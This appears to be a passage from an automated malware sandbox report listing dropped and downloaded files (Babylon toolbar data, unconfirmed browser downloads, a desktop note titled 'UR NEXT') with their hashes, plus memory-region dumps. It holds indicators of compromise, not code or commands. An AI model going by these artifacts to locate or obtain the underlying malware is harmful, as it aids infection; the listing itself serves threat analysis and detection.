                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\Babylon.dat

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            caba4f92c996b698e7923ec7cf6d66f5

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            5af3f322dc56c85a1bc0f4a884dac1907d2efa7f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            04c4ee982e3838368579739fcc0da68b3770f34fc6e2f200dc1499bc3268f3af

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f35f3a46b72c4a9b83de7ba1740b8cf2b4e32200dd43f687bf2f7ca16d4113b640d814525a5c4cb417aff66ed9cd5b03eac2b692396a332ce7613fa1564ec969

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\VersionInfo.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            92b68ca751162552c347d760831c6bd1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            8f7ff93ae85e965d402d0e114ed0abccf8e767fb

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            13663bb607172b128e4b2940f250afbcd0e52ab9e92bf0dd3f3870330c85a5fb

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            865246583fab1e3a2747869df9f75439276eab749a45a22bcf5629227629942c080b5929896cbc01849084ea58559bb07db744b9bccd68bf240c83cf6c647977

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            ebc22fdb7c394238cc02eb0f95d18946

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b103938158d8939dac436e4235fe85db29ca047e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            0187a539ea9d5704df650597b6d6e2880dfbdd1a1ca4a4727e478accc3781eef

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            36cebb650b146bede1cc724e78b9c1b07a32e540e36d2edaf2aff5be6e93b1e959510468d447503a84cf6b2b677167a72eb02198ef702951aed6fae6baea8bfe

                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR N1XT.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            396B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            9037ebf0a18a1c17537832bc73739109

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1d951dedfa4c172a1aa1aae096cfb576c1fb1d60

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            38c889b5d7bdcb79bbcb55554c520a9ce74b5bfc29c19d1e4cb1419176c99f48

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            4fb5c06089524c6dcd48b6d165cedb488e9efe2d27613289ef8834dbb6c010632d2bd5e3ac75f83b1d8024477ebdf05b9e0809602bbe1780528947c36e4de32f

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\BabylonToolbar.txt

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            57B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2ab0eb54f6e9388131e13a53d2c2af6c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            f64663b25c9141b54fe4fad4ee39e148f6d7f50a

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d24eee3b220c71fced3227906b0feed755d2e2b39958dd8cd378123dde692426

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            6b5048eeff122ae33194f3f6089418e3492118288038007d62cdd30a384c79874c0728a2098a29d8ce1a9f2b4ba5f9683b3f440f85196d50dc8bc1275a909260

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 150917.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            a56d479405b23976f162f3a4a74e48aa

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            f4f433b3f56315e1d469148bdfd835469526262f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            17d81134a5957fb758b9d69a90b033477a991c8b0f107d9864dc790ca37e6a23

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f5594cde50ca5235f7759c9350d4054d7a61b5e61a197dffc04eb8cdef368572e99d212dd406ad296484b5f0f880bdc5ec9e155781101d15083c1564738a900a

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 428452.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7621f79a7f66c25ad6c636d5248abeb9

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            98304e41f82c3aee82213a286abdee9abf79bcce

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 460536.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            93ceffafe7bb69ec3f9b4a90908ece46

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            14c85fa8930f8bfbe1f9102a10f4b03d24a16d02

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b87b48dcbf779b06c6ca6491cd31328cf840578d29a6327b7a44f9043ce1eb07

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c1cb5f15e2487f42d57ae0fa340e29c677fe24b44c945615ef617d77c2737ce4227d5a571547714973d263ed0a69c8893b6c51e89409261cdbedff612339d144

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 619364.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            fe537a3346590c04d81d357e3c4be6e8

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b1285f1d8618292e17e490857d1bdf0a79104837

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            bbc572cced7c94d63a7208f4aba4ed20d1350bef153b099035a86c95c8d96d4a

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            50a5c1ad99ee9f3a540cb30e87ebfdf7561f0a0ee35b3d06c394fa2bad06ca6088a04848ddcb25f449b3c98b89a91d1ba5859f1ed6737119b606968be250c8ce

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 700326.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            183KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            3d4e3f149f3d0cdfe76bf8b235742c97

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0e0e34b5fd8c15547ca98027e49b1dcf37146d95

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            b15c7cf9097195fb5426d4028fd2f6352325400beb1e32431395393910e0b10a

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            8c9d2a506135431adcfd35446b69b20fe12f39c0694f1464c534a6bf01ebc5f815c948783508e06b14ff4cc33f44e220122bf2a42d2e97afa646b714a88addff

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 700326.crdownload:SmartScreen

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4047530ecbc0170039e76fe1657bdb01

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            32db7d5e662ebccdd1d71de285f907e3a1c68ac5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 781233.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4.0MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1d9045870dbd31e2e399a4e8ecd9302f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            7857c1ebfd1b37756d106027ed03121d8e7887cf

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9b4826b8876ca2f1378b1dfe47b0c0d6e972bf9f0b3a36e299b26fbc86283885

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            9419ed0a1c5e43f48a3534e36be9b2b03738e017c327e13586601381a8342c4c9b09aa9b89f80414d0d458284d2d17f48d27934a6b2d6d49450d045f49c10909

                                                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 847843.crdownload

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.7MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            f2b7074e1543720a9a98fda660e02688

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            1029492c1a12789d8af78d54adcb921e24b9e5ca

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            4ea1f2ecf7eb12896f2cbf8683dae8546d2b8dc43cf7710d68ce99e127c0a966

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            73f9548633bc38bab64b1dd5a01401ef7f5b139163bdf291cc475dbd2613510c4c5e4d7702ecdfa74b49f3c9eaed37ed23b9d8f0064c66123eb0769c8671c6ff

                                                                                                                                                                                                                                                          • memory/1140-1088-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/1140-1089-0x00000000006B0000-0x00000000006B1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2340-855-0x000000001D280000-0x000000001D429000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.7MB

                                                                                                                                                                                                                                                          • memory/2500-822-0x000000001E800000-0x000000001EB0E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3.1MB

                                                                                                                                                                                                                                                          • memory/2500-819-0x000000001C3D0000-0x000000001C46C000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            624KB

                                                                                                                                                                                                                                                          • memory/2500-820-0x00000000011E0000-0x00000000011E8000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                          • memory/2500-821-0x000000001C4B0000-0x000000001C4FC000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                          • memory/3352-475-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                          • memory/3752-508-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                          • memory/3832-471-0x000000001BBC0000-0x000000001C08E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4.8MB

                                                                                                                                                                                                                                                          • memory/3832-473-0x000000001C1B0000-0x000000001C212000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            392KB

                                                                                                                                                                                                                                                          • memory/3832-472-0x000000001C090000-0x000000001C136000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            664KB

                                                                                                                                                                                                                                                          • memory/3980-1087-0x0000000010410000-0x000000001047E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            440KB

                                                                                                                                                                                                                                                          • memory/6824-12721-0x000001685F970000-0x000001685F992000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                          • memory/7944-14570-0x0000000006220000-0x00000000067C4000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                          • memory/7944-14588-0x000000000C6E0000-0x000000000C6EE000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                                                          • memory/7944-14587-0x000000000C720000-0x000000000C758000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            224KB

                                                                                                                                                                                                                                                          • memory/7944-14569-0x0000000000A80000-0x000000000112E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.7MB